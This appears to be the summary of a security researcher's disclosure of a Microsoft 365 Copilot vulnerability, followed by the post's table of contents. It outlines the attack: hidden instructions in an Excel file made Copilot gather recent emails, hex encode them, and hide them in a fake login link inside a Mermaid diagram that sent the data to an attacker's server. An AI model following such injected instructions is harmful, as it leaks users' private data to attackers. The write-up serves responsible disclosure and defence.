A security researcher discovered a data exfiltration vulnerability in Microsoft 365 Copilot that combined indirect prompt injection with Mermaid diagram CSS manipulation. By embedding malicious instructions in an Excel document, the researcher triggered Copilot to fetch sensitive tenant data like recent emails, hex encode them, and embed the encoded data in a fake login button hyperlink within a Mermaid diagram. When clicked, the link transmitted the data to an attacker's server. Microsoft patched the vulnerability by removing the ability to interact with dynamic content in rendered Mermaid diagrams. The researcher received no bounty as M365 Copilot was out of scope at the time.
Table of contents
tl;drMermaid DiagramsData Exfiltration via Mermaid DiagramsMSRC Researcher Celebration PartyIndirect Prompt InjectionFinal PayloadMitigation StrategyDisclosure TimelineSort: